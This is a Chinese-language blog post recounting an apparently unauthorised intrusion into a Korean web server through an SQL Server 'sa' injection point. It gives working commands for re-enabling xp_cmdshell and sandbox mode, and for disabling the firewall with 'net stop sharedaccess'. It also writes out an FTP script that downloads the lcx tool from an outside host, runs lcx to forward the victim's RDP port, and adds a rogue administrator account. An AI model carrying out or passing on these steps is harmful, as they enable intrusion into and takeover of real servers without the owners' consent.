记一次sa渗透记录

下午搞了一个站，存在sa注入点漏洞，window 2000+iis5。

通过注入点信息，发现sqlserver版本为7.00，以前见过一次这个版本，不过没有怎么深入研究，朋友扫弱口令扫描到的，当时也提权了，具体忘记怎么提的了。附图。

。

扫描这个ip地址发现只对外开放了53跟80，韩国的鸟站，由此猜测可能为内网或者外网但是限制了对外开放的端口。一般情况下会开启1433，跟3389的但是限制对外连接。

sqlserver7.0的虽然以前搞过，但是忘记具体怎么弄了，于是一步一步的先用穿山甲自带的功能恢复xp_cmdshell,sp_oa**,sp_***job,还有一个sandboxmode沙盒模式。都开启之后，随便执行set，ipconfig等命令发现没有回显，也不知道哪个组件可以命令。于是想到一个办法。

现在我本机执行lcx -listen 77 88通过77端口监听外部来的数据。然后在穿山甲里执行net stop sharedaccess通过xp_cmdshell,然后sp_oa**,sp_***job,沙盒模式一一执行，虽然不知道成功没，但是如果可以执行命令，肯定可以成功，目的是为了是对方机器能对外发送数据。接着跟刚才一样执行telnet 我的ip 22端口，最终发现通过沙盒模式可以执行命令。

但是对方的3389不允许连接，这时候想通过lcx端口转发来连接对方的3389，虽然不确定是3389但是碰碰运气。

其中的ftp传文件下载文件我亲自测试过，就用这个了。

echo open www.ftp.com>ftp.TXT //连接FTP
echo username>>ftp.TXT       //输入用户名
echo password>>ftp.TXT       //输入密码
echo get lcx c:/lcx.exe>>ftp.TXT //执行下载命令
echo bye>>ftp.TXT             //退出
ftp -s:ftp.txt                //执行FTP.TXT文件中的FTP命令
在穿山甲里依次执行以下语句，如果没有特殊情况。lcx就下载到对方机器c盘目录下了。

然后通过沙河模式执行c:/lcx.exe -slave 我的ip 77 127.0.0.1 3389

本机执行lcx -listen 77 88。

过了一小会发现有数据返回，证明lcx已经传上去了，并且将对方3389端口转发到本机上了。

本机再连接127.0.0.1:88，可以连接上终端，然后在穿山甲执行添加用户的命令net user user password /add

net localgroup administrators user /add连接终端，成功登陆。如图。

中间遇到一些问题就不说了。有什么疑问的可以提出来。

本文作者龙儿心由网络安全(www.91ri.org)收集整理.